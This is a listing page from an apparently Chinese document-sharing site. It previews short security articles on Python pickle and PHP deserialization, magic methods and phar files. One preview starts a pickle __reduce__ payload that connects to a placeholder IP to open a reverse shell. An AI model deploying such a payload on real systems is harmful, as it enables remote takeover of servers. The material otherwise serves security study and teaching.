.
.
.
.
.
.
文档搜索
搜索
分类
上传
我的
请输入搜索关键字
今日推荐
基础安全
等保专题
more
NodeBB简介
NodeBB是Design Create Play团队的一套使用Node.js(一套建立在Google V8 JavaScript引擎之上的网络应用平台)构建的论坛系统。
2022-08-28 14:56:49
16
Sitecore Experience Platform (XP) 简介
Sitecore Experience Platform (XP) 是一个用 .NET 编写的企业内容管理系统 (CMS),提供了用于内容管理、数字营销以及分析和报告的工具,该 CMS 被企业大量使用,包括许多财富 500 强中的公司。目前,Internet 上有超过 4.5 万个 Sitecore 实例。
2022-08-28 14:49:55
26
pickle反序列化执行代码反弹 shell
使用__reduce__魔术方法执行import pickleimport osclass A(object): def __reduce__(self): a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999)
2022-08-28 12:42:06
30
python pvm组成
PVM 由三个部分组成,引擎(或者叫指令分析器),栈区、还有一个 Memo (这个我也不知道怎么解释,我们姑且叫它 “标签区“)1.引擎的作用从头开始读取流中的操作码和参数,并对其进行处理,zai在这个过程中改变 栈区 和 标签区,处理结束后到达栈顶,形成并返回反序列化的对象2.栈区的作用作为流数据处理过程中的暂存区,在不断的进出栈过程中完成对数据流的反序列化,并最终在栈上生成发序列化的结果3.标签区的作用数据的一个索引或者标记如图所示:此处输入图片的描述注意:PVM 指令的书写规范(1)操作码
2022-08-28 12:37:33
36
python pickle序列化和反序列化的过程
1.序列化过程:(1)从对象提取所有属性,并将属性转化为名值对(2)写入对象的类名(3)写入名值对2.反序列化过程:(1)获取 pickle 输入流(2)重建属性列表(3)根据类名创建一个新的对象(4)将属性复制到新的对象中注意:这个对象只要能在当前环境下创建起来就能完成反序列化,否则则不能实现对象的重构
2022-08-28 12:25:42
28
python反序列化漏洞
序列化操作import pickleclass Demo():def init(self, name='h3rmesk1t'):self.name = nameprint(pickle.dumps(Demo()))输出:b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Demo\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8
2022-08-28 12:18:50
41
php反序列化绕过小Trick
php7.1+反序列化对类属性不敏感如果变量前是protected,序列化结果会在变量名前加上\x00*\x00但在特定版本7.1以上则对于类属性不敏感,比如下面的例子即使没有\x00*\x00也依然会输出abc<?php class test{ protected $a; public function __construct(){ $this->a = 'abc'; } public function __de
2022-08-27 12:27:32
183
php魔术方法调用顺序
来看个示例:<?phpclass Test{public function __construct(){echo 'construct run';}public function __destruct(){echo 'destruct run';}public function __toString(){echo 'toString run';return 'str';}public function __sl
2022-08-27 00:32:35
61
php常见魔术方法
__construct():构造函数,此函数会在创建一个类的实例时自动调用。__destruct():析构函数,此函数会在对象的所有引用都被删除或者类被销毁的时候自动调用。__sleep():执行serialize()函数之前,会检查类中是否存在_sleep()方法。如果存在,该方法会先被调用。__wakeup():执行unserialize()函数之前,会检查类中是否存在_wakeup()方法。如果存在,则会先调用_wakeup()方法,预先准备对象需要的资源。__toString():当一个
2022-08-27 00:26:52
47
php序列化示例代码
<?phpclass Person { public $name = "Tom"; private $age = 18; protected $sex = "male"; public function hello() { echo "hello"; }}$class = new Person();$class_ser = serialize($class);echo $class_se
2022-08-27 00:18:23
60
phar反序列化受影响函数
phar反序列化受影响函数
2022-08-26 23:57:50
61
生成phar文件
注意:要将php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件。<?php class TestObject { } @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?
2022-08-26 23:56:10
52
1
...
81
82
83
84
85
86
...
588
跳转到
页
确定
请选择文档类型
全部
请选择文档类型
注册 / 登录
夜间主题
搜索
分类
上传
我的
